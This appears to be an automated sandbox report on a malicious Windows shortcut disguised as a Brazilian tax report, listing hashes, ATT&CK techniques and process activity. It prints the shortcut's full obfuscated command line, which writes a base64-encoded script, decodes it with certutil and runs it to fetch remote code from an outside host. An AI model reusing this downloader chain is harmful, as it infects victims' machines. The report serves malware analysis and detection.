538e3d7d577f9c526daf56249932836b4d0717d8629e116788e280f911e0a45b

Analysis

max time kernel
62s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
20/12/2022, 14:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

RelatorioIRPF2022x_304.18016813.095072.77073.lnk
Size

505B
MD5

9609bb597e9252fe02fa47c21f901b27
SHA1

4f541c68aa32526ff1e39700de48046bcc201a26
SHA256

9efdc296086b6c3eb4c05d6833f865550c2b41dc645465d6c332efb5d0ae3e17
SHA512

8da6c24396304d979e4a88b93ba99d851052199f4cb62450ecb95df53893ecc8f13f74190aece127510aa1a769763cac44c26523360b25afefbc6cc445420668

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2816	conhost.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2928 wrote to memory of 2816	2928	cmd.exe	83
PID 2928 wrote to memory of 2816	2928	cmd.exe	83
PID 2816 wrote to memory of 4108	2816	conhost.exe	82
PID 2816 wrote to memory of 4108	2816	conhost.exe	82

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_304.18016813.095072.77073.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2928
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "MD C: MCG6PY\>nul&&s^eT KTPQ=C: MCG6PY\^tMCG6PY&&echo dmFyIENJdjA9InNjIisiciI7REl2MD0iaXAiKyJ0OmgiO0VJdjA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDSXYwK0RJdjArRUl2MCsiLy93OGl1bHIuY3l1Z2ZjcmdmbmdoeXVqa3VodGd5cmZlLmN5b3UvPzEvIik7>!KTPQ!.^Js&&certutil -f -decode !KTPQ!.^Js !KTPQ!.^Js&&CMD /c !KTPQ!.^Js"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /V/D/c "MD C: MCG6PY\>nul&&s^eT KTPQ=C: MCG6PY\^tMCG6PY&&echo dmFyIENJdjA9InNjIisiciI7REl2MD0iaXAiKyJ0OmgiO0VJdjA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDSXYwK0RJdjArRUl2MCsiLy93OGl1bHIuY3l1Z2ZjcmdmbmdoeXVqa3VodGd5cmZlLmN5b3UvPzEvIik7>!KTPQ!.^Js&&certutil -f -decode !KTPQ!.^Js !KTPQ!.^Js&&CMD /c !KTPQ!.^Js"
1⤵
PID:4108

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_304.18016813.095072.77073.lnk

Filesize
1KB

MD5
eb06a2f644b9218524229f4ae441102e

SHA1
f7b394bf78912215a709ca55f546c90c3a1aaa2a

SHA256
8dad8fc025c111d63562859b93122624bc9c6c17b1bc8b124b54be79377bd74d

SHA512
57198b85b06784ecdcaa009f217b16f6ecb718f5b256f9a5e926d118f3f62ec121f43108339f893c0e5f74e543c30c76d5ea8e554d979287854e4ba9de0980b0

Download Submit